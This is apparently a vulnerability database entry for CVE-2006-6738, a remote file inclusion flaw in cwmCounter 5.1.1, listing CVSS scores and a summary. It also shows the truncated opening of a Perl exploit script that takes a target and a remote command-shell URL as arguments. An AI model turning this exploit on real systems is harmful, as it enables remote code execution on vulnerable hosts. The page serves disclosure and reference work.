6.8
CVSSv2

CVE-2006-6738

Published: 26/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in statistic.php in cwmCounter 5.1.1 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

cwm-design cwmcounter

Exploits

#!/usr/bin/perl # #cwmCounter Remote File Include Exploit # #Coded by bd0rk || SOH-Crew # #Usage: cwmCounterpl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, Kacper, rgod # # use LWP::UserAgent; $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2]; if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()} he ...